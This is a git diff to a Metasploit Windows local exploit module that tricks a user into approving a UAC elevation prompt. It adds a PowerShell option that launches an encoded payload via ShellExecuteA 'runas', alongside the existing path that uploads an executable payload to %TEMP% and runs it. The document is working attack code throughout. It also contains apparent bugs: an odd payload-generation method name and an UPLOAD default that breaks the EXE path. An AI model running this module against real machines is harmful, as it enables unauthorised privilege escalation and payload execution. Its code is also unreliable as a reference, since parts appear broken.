diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index 9e2b996c3c..163f62edde 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb @@ -7,12 +7,14 @@ require 'msf/core' require 'msf/core/exploit/exe' +require 'msf/core/exploit/powershell' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::EXE include Post::File + include Exploit::Powershell def initialize(info={}) super( update_info( info, @@ -23,7 +25,10 @@ class Metasploit3 < Msf::Exploit::Local UAC settings. }, 'License' => MSF_LICENSE, - 'Author' => [ 'mubix' ], + 'Author' => [ + 'mubix', # Original technique + 'b00stfr3ak' # Added powershell option + ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], @@ -31,13 +36,14 @@ class Metasploit3 < Msf::Exploit::Local 'References' => [ [ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ] ], - 'DisclosureDate'=> "Jan 3 2012" + 'DisclosureDate'=> "Jan 3 2012", )) register_options([ OptString.new("FILENAME", [ false, "File name on disk"]), OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]), - OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]) + OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", false ]), + OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]), ]) end @@ -71,31 +77,42 @@ class Metasploit3 < Msf::Exploit::Local # # Generate payload and random names for upload # - payload = generate_payload_exe - if datastore["FILENAME"] - payload_filename = datastore["FILENAME"] + if datastore["TECHNIQUE"] == "EXE" + if datastore["UPLOAD"] + exe_payload = generate_exe_payload_exe + + if datastore["FILENAME"] + payload_filename = datastore["FILENAME"] + else + payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" + end + + if datastore["PATH"] + payload_path = datastore["PATH"] + else + payload_path = session.fs.file.expand_path("%TEMP%") + end + + cmd_location = "#{payload_path}\\#{payload_filename}" + + if datastore["UPLOAD"] + print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...") + fd = session.fs.file.new(cmd_location, "wb") + fd.write(exe_payload) + fd.close + end + + session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5) + else + print_error("No Upload Path!") + return + end else - payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" + command = cmd_psh_payload(payload.encoded) + arguments = command.gsub("%COMSPEC% /B /C start powershell.exe ","") + session.railgun.shell32.ShellExecuteA(nil,"runas","powershell.exe","#{arguments}",nil,5) end - - if datastore["PATH"] - payload_path = datastore["PATH"] - else - payload_path = session.fs.file.expand_path("%TEMP%") - end - - cmd_location = "#{payload_path}\\#{payload_filename}" - - if datastore["UPLOAD"] - print_status("Uploading #{payload_filename} - #{payload.length} bytes to the filesystem...") - fd = session.fs.file.new(cmd_location, "wb") - fd.write(payload) - fd.close - end - - session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5) - end end